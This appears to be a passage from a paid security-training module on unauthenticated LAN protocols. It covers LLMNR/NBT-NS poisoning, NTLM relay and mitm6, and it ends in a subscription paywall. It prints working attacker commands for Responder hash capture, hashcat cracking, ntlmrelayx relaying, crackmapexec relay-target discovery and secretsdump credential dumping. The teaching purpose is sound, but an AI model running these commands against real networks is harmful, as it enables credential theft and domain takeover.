The protocols that make networks work β ARP, DHCP, DNS, LLMNR, NBT-NS, mDNS β were all designed with zero authentication. They worked in the original LAN era because the LAN was a single trusted segment. In 2026, these protocols are still deployed at scale, still unauthenticated, and attackers still farm them for credentials daily. This module covers why Layer 2/3 protocols remain catastrophic trust points.
Why this happens
ARP (1982), DHCP (1993), DNS (1987), LLMNR (2007) β the dates tell the story. Designed before network-scale threat models existed. Designed when “the network” meant “the cable in the office.” Signed/authenticated versions exist (DNSSEC, DHCPv6 with authentication, 802.1X) but deployment is uneven. Microsoft Active Directory still uses LLMNR and NBT-NS by default on domain-joined workstations in 2026 despite Microsoft’s own published guidance recommending disabling them.
The attacker’s position: on the local segment (after phishing or Wi-Fi compromise), inject responses to these unauthenticated protocols. Victim workstations accept the injected responses as truth. Credentials, session info, and lateral movement opportunities follow.
The classic: LLMNR / NBT-NS poisoning
When a Windows workstation tries to resolve a hostname not in DNS, it asks LLMNR (port 5355) and NBT-NS (137) on the local subnet via broadcast. “Hey, does anyone know where PRINTER-3RD-FLOOR is?” Any attacker on the subnet can respond: “Yes, that’s me.” Victim then authenticates to the attacker, sending their NTLM hash.
# Start Responder (on attacker's Linux box connected to target LAN)
sudo responder -I eth0 -wrfv
# Responder output (within minutes):
# [+] Listening for events...
# [SMB] NTLMv2-SSP Hash captured for alice.smith
# [SMB] Username : CORP\alice.smith
# [SMB] Hash : alice.smith::CORP:abc123...
# Crack offline with hashcat
hashcat -m 5600 captured_hashes.txt rockyou.txt
# Or relay without cracking
sudo responder -I eth0 -dwrfv -disable-ess # Don't respond to SMB
sudo ntlmrelayx.py -tf targets.txt -smb2support
A typical 100-employee office with LLMNR enabled yields 20+ captured hashes in the first hour. Of those, 2-5 usually crack within minutes against common passwords. Now the attacker has domain credentials.
SMB relay: no cracking needed
If you have a captured hash but can’t crack it, relay it instead. Relay it to another system where the victim is local admin β now you have RCE on that system as the victim. ntlmrelayx from impacket is the standard tool.
# Find SMB servers with signing disabled (relay target candidates)
crackmapexec smb 10.20.30.0/24 --gen-relay-list relay_targets.txt
# Relay captured NTLM auth to target SMB server
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -socks
# Or escalate: SOCKS proxy the relayed session
proxychains secretsdump.py CORP/alice.smith@10.20.30.45 -no-pass
mitm6 β DHCPv6 attack
Windows prefers IPv6 over IPv4. If the network doesn’t properly configure DHCPv6, a rogue DHCPv6 server can advertise itself as the default IPv6 gateway. Now IPv6 DNS queries go to attacker. Combined with WPAD (Web Proxy Auto-Discovery), attacker MITMs web traffic. Combined with NTLM relay, full domain compromise.
π Intermediate Module Β· Basic Tier
Continue reading with Basic tier (βΉ499/month)
You've read 29% of this module. Unlock the remaining deep-dive, quiz, and every other Intermediate module.
99+ modulesAll levels up to this tier
20-question quizzesUnlimited retries with explanations
Completion certificatesShareable on LinkedIn
7 more sections locked below
